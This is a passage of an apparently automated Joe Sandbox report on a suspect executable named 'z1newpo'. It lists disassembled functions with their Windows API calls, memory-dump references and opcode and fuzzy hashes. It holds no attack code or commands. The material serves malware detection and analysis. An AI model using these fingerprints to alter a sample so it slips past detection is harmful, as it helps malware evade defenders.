                                                    • DeleteObject.GDI32(?), ref: 00455736
                                                    • DeleteObject.GDI32(?), ref: 00455744
                                                    • DestroyIcon.USER32(?), ref: 00455752
                                                    • DestroyWindow.USER32(?), ref: 00455760
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                    • String ID:
                                                    • API String ID: 3691411573-0
                                                    • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                    • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                    • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                    • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                    Function 00447275 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                      • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                      • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                    • LineTo.GDI32(?,?,?), ref: 004472AC
                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                    • LineTo.GDI32(?,?,?), ref: 004472C6
                                                    • EndPath.GDI32(?), ref: 004472D6
                                                    • StrokePath.GDI32(?), ref: 004472E4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                    • String ID:
                                                    • API String ID: 372113273-0
                                                    • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                    • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                    • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                    • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                    Function 0044CC51 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 0044CC6D
                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CapsDevice$Release
                                                    • String ID:
                                                    • API String ID: 1035833867-0
                                                    • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                    • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                    • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                    • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                    Function 00417082 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • __getptd.LIBCMT ref: 0041708E
                                                      • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                      • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                    • __amsg_exit.LIBCMT ref: 004170AE
                                                    • __lock.LIBCMT ref: 004170BE
                                                    • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                    • _free.LIBCMT ref: 004170EE
                                                    • InterlockedIncrement.KERNEL32(016A2DB0), ref: 00417106
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                    • String ID:
                                                    • API String ID: 3470314060-0
                                                    • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                    • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                    • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                    • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                    Function 0044B63B Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                    • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                    • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                      • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                    • String ID:
                                                    • API String ID: 3495660284-0
                                                    • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                    • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                    • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                    • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                    Function 00410AB0 Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Virtual
                                                    • String ID:
                                                    • API String ID: 4278518827-0
                                                    • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                    • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                    • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                    • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                    Function 004151BB Relevance: 9.0, APIs: 6, Instructions: 29threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                      • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                      • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                    • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                      • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                    • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                    • ExitThread.KERNEL32 ref: 004151ED
                                                    • __freefls@4.LIBCMT ref: 00415209
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                    • String ID:
                                                    • API String ID: 442100245-0
                                                    • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                    • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                    • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                    • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                    Function 0045F790 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 216windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                    • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                    • _wcslen.LIBCMT ref: 0045F94A
                                                    • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                    • String ID: 0
                                                    • API String ID: 621800784-4108050209
                                                    • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                    • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                    • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                    • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                    Function 00478172 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 176COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • SetErrorMode.KERNEL32 ref: 004781CE
                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                      • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                    • SetErrorMode.KERNEL32(?), ref: 00478270
                                                    • SetErrorMode.KERNEL32(?), ref: 00478340
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                    • String ID: \VH
                                                    • API String ID: 3884216118-234962358
                                                    • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                    • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                    • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                    • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                    Function 00448480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                    • IsMenu.USER32(?), ref: 0044854D
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                    • DrawMenuBar.USER32 ref: 004485AF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$DrawInfoInsert
                                                    • String ID: 0
                                                    • API String ID: 3076010158-4108050209
                                                    • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                    • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                    • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                    • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                    Function 00469CDB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                    • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$_memmove_wcslen
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 1589278365-1403004172
                                                    • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                    • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                    • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                    • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                    Function 00443442 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Handle
                                                    • String ID: nul
                                                    • API String ID: 2519475695-2873401336
                                                    • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                    • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                    • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                    • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                    Function 0044334F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Handle
                                                    • String ID: nul
                                                    • API String ID: 2519475695-2873401336
                                                    • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                    • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                    • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                    • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                    Function 00440C49 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
